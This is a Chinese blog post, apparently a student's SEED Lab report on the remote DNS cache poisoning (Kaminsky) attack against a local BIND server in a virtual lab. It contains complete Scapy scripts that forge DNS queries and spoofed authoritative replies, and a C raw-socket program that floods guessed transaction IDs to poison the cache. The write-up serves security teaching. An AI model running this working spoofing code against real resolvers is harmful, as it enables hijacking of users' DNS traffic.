SEEDLab DNS_Remote Attack 实验报告

最新推荐文章于 2022-08-10 10:05:02 发布
最新推荐文章于 2022-08-10 10:05:02 发布
阅读量2.5k 收藏 13
点赞数 5
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C_Ronaldo__/article/details/111281411
版权

DNS_Remote Attack Seedlab Project

实验主机配置

主机名IP地址
用户主机10.0.2.5
本地DNS服务器10.0.2.7
攻击者10.0.2.4

实验环境

实验步骤与结果分析

task1 环境安装

由于DHCP为主机自动配置,同时会对etc/resolv.conf文件机进行自动写入覆盖,所以需要进行在用户机的/etc/resolvconf/resolv.conf.d/head 文件中加入 nameserver 10.0.2.7,其中head文件内容会再DHCP自动运行写覆盖etc/resolv.conf文件时,将head文件内容写入etc/resolv.conf文件中,查看两个文件内容,确实相同,结果如下:

10.0.2.7 为设置的本地 DNS 服务器, 当随后测试:

结果表明此时的用户主机的本地dns服务器已经变成了我们设定的10.0.2.7.

task2 Configure the Local DNS Server (the Server VM)

按照实验要求进行配置相关文件,主要对此文件进行能如下配置(10.0.2.4是本实验攻击者IP):

这个配置可以帮助我们在没有购买attacker32.com域的前提下,可以在攻击成功(本地缓存中某个域名example.com的查询将全部指向attacker32.com) 后直接查询设置的攻击者IP:10.0.2.4

task3 Configure the Attacker VM

按照实验要求下载所需要的文件后,对两个文件分别进行如下配置:
attacker32:
attacker.com.zone配置
example文件:

== 上面图片中的问题,目前还没有想明白作用是什么? ==

task4 Testing the Setup

Get the IP address of ns.attacker32.com.

在用户机测试结果:

过程分析:
由于在task2中,我们在本地dns服务器配置了attacker32.com的域名与IP地址的配置对应,使attacker32.com域指向了攻击者主机10.0.2.4,而在攻击者主机10.0.2.4中配置了bind中的attacker.com.zone文件中的IP主机名的映射关系,如图:attacker.com.zone配置
所以理论上我们会查询到的IP地址为10.0.2.19,根据实验结果,相符合,同时使用wireshark抓包,发现过程与分析一致.

Get the IP address of www.example.com

不加@ns.attacker32.com,可以查到官方合法IP地址:

加@ns.attacker32.com,查询失败:

失败的原因如下:
加@ns.attacker32.com,表示去ns.attacker32.com主机查询www.example.com的IP地址,同时由于在上面实验中得到了ns.attacker32.com了,会在本地dns缓存中,本地dns会直接返回对应IP,以及其他字段信息,所以wireshark抓包测试,得到如下结果:

本地dns回复用户具体信息:

同时由于10.0.2.19主机不存在,主机便不断发送ARP请求报文查询对应MAC地址,由于主机不存在,ARP查询报文不断发送,导致超时失败,抓包结果如下:

Attack Task

task 4: Construct DNS request

在攻击者主机运行如下代码:

#!/usr/bin/python
from scapy.all import *
def SendPacket():
	IPpkt=IP(dst='10.0.2.7',src='10.0.2.4') #dst:DNS server IP --- src:attacker IP
	UDPpkt=UDP(dport=53, sport=2222 , chksum=0 )
	Qdsec=DNSQR(qname='www.example.com')
	DNSpkt=DNS(id=0xaaaa, qr=0, qdcount=1,ancount=0,nscount=0,arcount=0,qd=Qdsec)
	Requestpkt=IPpkt/UDPpkt/DNSpkt
	send(Requestpkt)
	
SendPacket()

抓包得到如下:

由于dns请求数据包为伪造,所以当主机收到回复的dns报文后,会产生ICMP端口不可达的回复报文.

task 5: Spoof DNS Replies

在攻击者主机运行如下代码:

#!/usr/bin/python
from scapy.all import *
def ReplyPacket():
	name = 'www.example.com'
	domain = 'example.com' #域名
	ns = 'attacker32.com' #要伪造的目的域名
	Qdsec = DNSQR(qname=name)
	Anssec = DNSRR(rrname=name, type='A', rdata='1.2.3.4', ttl=259200)
	NSsec = DNSRR(rrname=domain, type='NS', rdata=ns, ttl=259200)
	dns = DNS(id=0xAAAA, aa=1, rd=1, qr=1,
	qdcount=1, ancount=1, nscount=1, arcount=0,
	qd=Qdsec, an=Anssec, ns=NSsec)
	ip = IP(dst='10.0.2.7', src='93.184.216.34')
	udp = UDP(dport=3333, sport=53, chksum=0)
	reply = ip/udp/dns
	send(reply)

ReplyPacket()

由于在此任务的实验过程中被攻击的主机没有进行dns查询,所以也不会出现接受回复的结果,通过wireshark抓包测试,得到如下结果:

同样会出现端口不可达的ICMP回复报文.

task 6 Launch the Kaminsky Attack

在实验过程中,由于我们需要利用的漏洞为一个时间差间隙,即在本地DNS服务器接收到我们伪造的example.com域名上的主机名*****.example.com的IP查询报文后,由于本地服务器并不可以解析,所以向example.com域服务器发送一个询问报文,真实的example.com域服务器IP经过查询后,把如果*****.example.com的IP地址存在,则返回IP,不存在,则返回没有此主机名IP的结果,我们利用此间隙,当我们伪造报文成功,并且在真实dns回复数据包之前到达本地dns服务器,本地des服务器就会接受我们伪造的数据包,从而达到欺骗成功的目的.

但是,由于远程攻击,所以我们不会知道16bit的transaction ID,(源端口号也是随机数,需要进行猜测,但是为了简化实验,固定为33333) 这个数据需要我们猜测,所以需要进行多次测试,提高碰撞的成功率.

python语法简单,方便构造,但是发送数据包速度过慢,导致对漏洞时间间隙的利用率下降,成功率降低,所以使用需要C语言,为了利用python中scapy库构造数据包简单的优点,我们可以在python程序中构造数据包并写入文件,在C语言程序中读取数包文件,并且进行修改部分参数,进行发送伪造数据包.

针对此思路,我们进行实验:

利用python生成Query.bin文件

使用如下代码:

#!/usr/bin/python
from scapy.all import *
def GenerateQueryPacket():
	targetName='abcde.example.com' #abcde为随意设定,后续会修改
	IPpkt=IP(dst='10.0.2.7',src='10.0.2.4') #dst:DNS server IP --- src:attacker IP
	UDPpkt=UDP(dport=53, sport=1234 , chksum=0 )#源端口可以任意设置
	Qdsec=DNSQR(qname=targetName)
	DNSpkt=DNS(id=0xaaaa, qr=0, qdcount=1,ancount=0,nscount=0,arcount=0,qd=Qdsec)
	Querypkt=IPpkt/UDPpkt/DNSpkt
	# Save the packet data to a file
	with open('Query.bin', 'wb') as f:
		f.write(bytes(Querypkt))
GenerateQueryPacket()

其中查询的域名初步设定为abcde.example.com,可随意设定

利用python生成Reply.bin文件

使用如下代码:

#!/usr/bin/python
from scapy.all import *
# Construct the DNS header and payload
def MainProcess():
	targetName = 'twysw.example.com'#twysw为随意设定,后续会修改,但是长度需要固定
	targetDomain = 'example.com'
	Qdsec = DNSQR(qname=targetName)
	Anssec = DNSRR(rrname=targetName, type='A', rdata='1.2.3.4', ttl=259200)
	NSsec  = DNSRR(rrname=targetDomain, type='NS',
			   rdata='ns.attacker32.com', ttl=259200)
	dns= DNS(id=0xAAAA, aa=1, rd=0, qr=1,
			 qdcount=1, ancount=1, nscount=1, arcount=0,
			 qd=Qdsec, an=Anssec, ns=NSsec)
	# Construct the IP, UDP headers, and the entire packet
	ip = IP(dst='10.0.2.7', src='199.43.135.53', chksum=0)  # 199.43.135.53和199.43.133.53任选一个即可,C程序中会进行修改参数 
	udp = UDP(dport=33333, sport=53, chksum=0)#33333为为简化实验而固定的一个参数
	pkt = ip/udp/dns
	# Save the packet to a file
	with open('Reply.bin', 'wb') as f:
		f.write(bytes(pkt))

MainProcess()

域名twysw.example.com为随意设定,但是为了方便后续实验,可以固定域名长度,否则不方便进行后续文件的域名offset参数的确定,使用bless进行查看offset参数,此时的Reply文件中offset参数如下:

参数名称offset值
Transaction ID28
第一个twysw.example.com41
第二个twysw.example.com64
源IP地址12

发送询问与伪造回复程序(C语言)

使用如下代码:

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include<time.h>

#define MAX_FILE_SIZE 2000
#define TARGET_IP "10.0.2.7" 
int send_packet_raw (int sock, char *ip, int n);
char* GenerateRand();

int main()
{
    // Create raw socket
    int enable=1;
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));

    //####read Query.bin to ip1[] Start #########
    FILE *f1 = fopen("Query.bin", "rb");
    if (!f1) 
    {
        perror("Can't open 'Query.bin'");
        exit(0);
    } 
    unsigned char ip1[MAX_FILE_SIZE];
    int n1 = fread(ip1, 1, MAX_FILE_SIZE, f1);
    //####read Query.bin End #########
    

    //####read Reply.bin to ip2[]  Start #########
    FILE *f2 = fopen("Reply.bin", "rb");
    if (!f2) 
    {
        perror("Can't open 'Reply.bin'");
        exit(0);
    } 
    unsigned char ip2[MAX_FILE_SIZE];
    int n2 = fread(ip2, 1, MAX_FILE_SIZE, f2);
    //####read Reply.bin End#########

    srand((unsigned)time(NULL));
    for(int temp=0;temp<200;temp++) //重复200次
    {
        // #######send query Begin ############
        char*name=GenerateRand();
        // Modify the name in the question field (offset=41)
        memcpy(ip1+41,name, 5); 
        send_packet_raw(sock, ip1, n1);
        // #######send query End ############

        //  #######send Mult reply Begin #########
        //  Modify the name in the question field (offset=41)
        memcpy(ip2+41, name , 5); 
        // Modify the name in the answer field (offset=64)
        memcpy(ip2+64,name, 5);
        // Modify the IP addr in the src IP field (offset=14) 199.43.133.53->199.43.135.53
        char c='\x87';
        memcpy(ip2+14,&c, 1);
        for (int id=1; id<400; id++)
        {
            // Modify the transaction ID field (offset=28)
            unsigned short id_net_order;
            id_net_order = htons(id);
            memcpy(ip2+28, &id_net_order, 2); 
            // Send the IP packet out
            send_packet_raw(sock, ip2, n2);
        } 
        // Modify the IP addr in the src IP field (offset=14) 199.43.135.53->199.43.133.53
        char c2='\x85';
        memcpy(ip2+14,&c2, 1); 
        for (int id=1; id<400; id++)
        {
            // Modify the transaction ID field (offset=28)
            unsigned short id_net_order;
            id_net_order = htons(id);
            memcpy(ip2+28, &id_net_order, 2); 
            // Send the IP packet out
            send_packet_raw(sock, ip2, n2);
        }
        // #######send Mult Reply End#########


        free(name);
        name=NULL; // A good habit for security
        printf("######\thave tried %d\t times, Start Next######### \n",temp);
        usleep(1000); //1000ms delay
    }
    close(sock);
}

char* GenerateRand()
{
  char a[26]="abcdefghijklmnopqrstuvwxyz";
// Generate a random name of length 5
  char*name=malloc(5);
  for (int k=0; k<5; k++)
    name[k] = a[rand() % 26];
  return name;
}


int send_packet_raw(int sock, char *ip, int n)
{
  struct sockaddr_in dest_info;
  dest_info.sin_family = AF_INET;
  dest_info.sin_addr.s_addr = inet_addr(TARGET_IP);
  int r = sendto(sock, ip, n, 0, (struct sockaddr *)&dest_info, sizeof(dest_info));
}

代码中各个参数解释:

为什么更换IP地址(199.43.135.53与199.43.133.53)?

这是因为example.com有两个IP:199.43.135.53与199.43.133.53,在实验过程中我们发现,两个IP都会被使用,且随机切换,为了提高成功率,所以我们每次伪造回复数据包时,两个IP地址都进行伪造,其中相关代码行如下:

` // Modify the IP addr in the src IP field (offset=14) 199.43.133.53->199.43.135.53
        char c='\x87';
        memcpy(ip2+14,&c, 1); `

参数offset 为14,通过bless查看二进制文件可以得到.

为什么伪造id数目设定为400,可以再增加吗?

在进行wireshark测试过程中,我们发现使用C语言发送一个数据包大约为2ms,而我们可以利用的的本地DNS服务器发送的查询报文与回复报文之间的间隙时间大约为3000ms,所以理论上我们可以进行伪造1500个报文,可以在正确报文到达之前被接受,此时,我们针对两个IP分别伪造400个,进行测试,但是理论上可以进行再次增加,可以有效提高成功率,缩短时间.如果成功率低,可以进行改变此参数进行测试,需要实际情况实际分析.

为什么设定usleep(1000)?

延迟1000ms,进行下一轮测试.可随意设定

实验结果

运行上面C语言程序send_dns.py:

可以多次运行,以达到缓存成功目的,进行多次测试,平均运行2次,检查本地DNS服务器缓存,使用如下命令:

sudo rndc dumpdb -cache
cat /var/cache/bind/dump.db | grep attacker.com

最终得到如下结果,则说明伪造数据包成功,被本地DNS服务器缓存:

此时,使用用户主机使用dig进行测试,得到如下结果:

dig @ns.attacker32.com www.example.com


但是在实验过程中,并不会得到上图的查询结果,仍然出现下图失败结果:
经过wireshark抓包测试,我们发现出现大量ARP请求报文,针对10.0.2.19的询问报文,What??10.0.2.19, 见过!!! 再想一想,嗯,在task2中,对attacker.com.zone文件的配置,ns.attacker.com被设定为10.0.2.19,而这个主机是不存在的,所以出现此结果,进行如下修改,修改为10.0.2.4:
在这里插入图片描述
随后,即可得到成功解析结果.

dig www.example.com

说明攻击成功.

task7 Result Verification

上面已经验证.

实验总结与思考

有时间再写,玩去了,哈哈哈

:风雪夜归人
关注
  • 5
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Seedlabs】Local DNS Attack Lab
seven49的博客
04-07 3499
目录 一、实验概述 二、实验环境 2.1 测试 DNS 设置 三、实验内容 域名解析 Answers 毒化 2、域名解析 NS 毒化 3、kaminsky 攻击 一、实验概述 DNS (Domain Name System) is the Internet’s phone book; it translates hostnames to IP addresses (and vice versa). This translation is through DNS resolution...
【DNS缓存中毒实验】SEED lab:DNS Remote Attack Lab The Kaminsky Attack
04-11
【DNS缓存中毒实验】SEED lab 远程DNS实验代码,The Kaminsky Attack Lab详情操作可见博客 原创代码,码字不易 实测可完成攻击,遇到问题,请及时联系博主。
Seed lab dns欺骗实验——dns local&dns remote
freedomDA的博客
11-20 7300
文章目录1. 实验2. 实验步骤及结果2.1 DNS _Local2.1.1 环境搭建容器部署DNS配置测试部署2.1.2 The Attack TasksTask 1: Directly Spoofing Response to UserTask 2: DNS Cache Poisoning Attack – Spoofing AnswersTask 3: Spoofing NS RecordsTask 4: Spoofing NS Records for Another DomainTask 5: Sp
SeedLab8: Remote DNS Attack (Kaminsky Attack) Lab
Rachel_IS的博客
01-19 2521
做完了本地的,来康康远程的 难点就是不能嗅探数据包再进行伪造了,一些字段要通过猜测得到 Task 1 local里配过了,验证一下就行 Task 2 按教程配一条转发 (因为我们自己设置的域名是真实存在的…如果将其作为权威服务器,那么本地DNS服务器会向顶级DNS服务器请求它的IP,然后发送请求,但是这就超出了我们的控制范围 (配一条转发,就是让DNS服务器把对这个权威服务器的请求都发往我们能控制的IP 其他的按教程删改 Task 3 attacker上配两个zone文件(网站上下载模版 (这里要注
Seed lab:Remote DNS Attack
pang241的专栏
05-27 3556
实验环境:服务器ip:192.168.86.139Victim ip: 192.168.86.137Attacker ip:192.168.86.138准备工作: 安装bind9服务器:在bind9官网 下载bind9,在此下载的是bind9.10.4 解压文件tar -xzvf bin9.10.4.tar.gz cd bin9.10.4,并./configure –prefix=/usr/loca
dns-amplification.tar.gz_dns attack
09-14
Perl script for DNS Amplification attack.
dns_query.rar_dns _dns query
09-20
在这个“dns_query.rar_dns _dns query”压缩包中,核心文件“dns_query.c”可能包含了一个实现DNS查询功能的C语言源代码。 在深入讨论之前,我们要明确DNS查询的基本流程:当一个应用程序需要解析域名时,它会通过...
DNS服务器的配置实验报告.doc
06-25
实验报告---DNS服务器配置 一、 实验目的: 1、配置DNS服务器。 2、了解DNS服务器的使用方法。 二、 实验内容: 在一台安装好 Linux 系统的真实机上进行BIND软件包的安装,启动DNS,为其配置文件(包括主配置文件,...
dns_resolve.rar_dns
09-14
标题中的“dns_resolve.rar_dns”暗示了我们讨论的主题聚焦在DNS(Domain Name System)解析上,这是一项核心的互联网服务,用于将人类可读的域名转换为计算机可识别的IP地址。描述中提到的“linux fs nfs dns ...
【DNS缓存污染实验】 SEED LAB 远程DNS 缓存中毒--Kaminsky 攻击复现
PsgQ的博客
04-11 3387
SEED LAB 远程DNS 缓存中毒–Kaminsky 攻击复现 0x00 搭建实验环境 使用3台Ubuntu 16.04虚拟机,可到下面的参考链接下载 攻击的服务是BIND9,由于条件限制,这里使用本地的一台虚拟机当作远程DNS解析器,关闭了DNSSEC服务,其中三台机器IP地址,如下图所示: 具体的实验环境搭建过程,可参考:SEED Lab Description 配置User VM: 在用户机 的 /etc/resolvconf/resolv.conf.d/head文件中,加入下面语句,将
【SEED LABS】The Kaminsky Attack Lab
qq_43599063的博客
08-10 1883
这个实验的目的是让学生获得关于远程DNS缓存中毒攻击(也称为Kaminsky DNS攻击)的第一手经验。DNS(域名系统)是互联网的电话簿;它将主机名转换为IP地址,反之亦然。这种转换是通过DNS解析进行的,它在幕后进行。DNS攻击以各种方式操纵这个解析过程,目的是将用户误导到其他目的地,这通常是恶意的。这个实验室专注于一种特殊的DNS攻击技术,称为DNS缓存中毒攻击。 • DNS and how it works • DNS server setup • DNS cache poisoning attac
SEED LABS初入
SiSong_Ru的博客
03-05 5500
SEED LABS初入及实验环境配置 1、什么是SEED LABS? SEED LABS是一系列的网络安全实验,其基本囊括了信息安全本科生所涉及到的几乎每个方面,例如软件安全,Web安全,密码学安全等。而每一个方面的实验又由好几个单独的实验组成: 每个实验均配套有相应的实验代码已经实验指导书,甚标注了实验难度,至还出有配套的实验视频,学生可以只有选择自己喜欢的实验内容来完成。 ...
SeedLab7: Local DNS Attack Lab
Rachel_IS的博客
01-19 3725
这次是三个DNS 好处是配一次环境就行 Local应该是最容易的,因为直接通过嗅探伪造DNS包 Task 1 在resolv.conf.d/head 里写入Server的地址 然后dig试一下,没问题的话返回的SERVER字段就是写入的那个IP (如果看到127.0.0.1,可以把/etc/resolv.conf中其他的server注释掉再试一下 Task 2 跟着教程配,再重启bind 9即可 此时在User主机使用ping,能看到先向DNS服务器获得IP,然后再发送ICMP数据包 第一次查询的
seed lab 2020 Local DNS Attack Report
weixin_44005234的博客
11-25 2830
实验环境: User Machine’s IP : 10.0.2.8 Attacker’s IP : 10.0.2.7 Local DNS Server : 10.0.2.4 Task 1 打开/etc/resolvconf/resolv.conf.d/head文件,然后添加将10.0.2.4作为DNS服务器的记录,并重启加载配置使记录生效: $ sudo vim /etc/resolvconf/resolv.conf.d/head nameserver 10.0.2.4 $ sudo resolvco
Local DNS Attack Lab
koko2015c的博客
02-24 3695
DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RFC 2136对DNS的动态更新进行说明
DNS劫持攻击实验
文武老司机的博客
12-24 2102
DNS劫持攻击: 0x01 攻击目的: ​ 劫持靶机的DNS请求,将靶机所有的http请求流量都引导到攻击机搭建的web服务器(shadow website)供靶机访问。 0x02 环境介绍: ​ 攻击机:Kali linux ​ 靶机:ubuntu 20.04 ​ 存在形式:vmware之虚机 ​ 联网方式:NAT ​ IP地址: ​ Gateway:192.168.8.2/24 ​ Kali linux:192.168.8.128/24 ​
SEED Labs信息安全实验
红蓝联盟的博客
07-04 1万+
1.1  SEED Labs 介绍    SEED Labs是一套完整的信息安全实验,涵盖本科信息安全教学中的大部分基本原理,可用于提高学生体验式学习的实验室练习。项目组2002年由杜文亮教授创建,目前开发了30个实验,涵盖了各种计算机安全概念,原理和实践,几百所大学已采用。实验楼翻译制作的SEEDLabs在线实验课永久免费并开源。    SEED Labs网站:http://www.cis.sy...
信息安全实验:实现一个fake-wifi
zekdot的博客
10-17 2641
一、引言 这是信息安全课上老师讲的一个案例吧,某人创建一个假的热点,然后等待人来连接,然后去获取连接者的数据。 这个实验感觉还是比较有意思的,毕竟以前总听说过假WIFI泄露数据的案例但从来没有亲手实验过,所以这也算是一个比较好的机会吧,更何况交实验报告还能拿分。。 二、开放新的热点: 虽然这个实验名称叫做fake-wifi,但本质上这是一个真正的wifi,只是开放者可以监听到其中的数据包而...
深入理解计算机系统attack lab
热门推荐
peanWang的博客
05-26 4万+
Attack lab
seedlab dns攻击
最新发布
05-14
Seed Lab是一个以安全教育为主的实验室,在其设计的实验中,有一个名为DNS攻击的实验。DNS(Domain Name System)是互联网中解析域名与IP地址的协议,攻击者可以借助DNS攻击来实现将目标网站的域名解析到恶意IP地址上的目的。 在Seed Lab DNS攻击实验中,主要包括基于DNS的欺骗、DNS缓存投毒、DNS隧道和DNS随机子域名攻击四种类型的DNS攻击。参与实验的学生需要熟悉DNS的工作原理,理解DNS欺骗、DNS缓存投毒等攻击的基本原理并能够实现相应的攻击手段。最终目的是通过实践加深学生对网络安全的认识,培养学生的安全意识和安全技能。 相比其他实验室所提供的工具练习和规范测试,Seed Lab更具有实际应用性和可操作性,使得学生能够在实践中掌握网络安全技能。因此,通过Seed Lab的实验,我更加熟悉DNS攻击的基本原理和具体操作,对于网络安全的了解也更加深入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值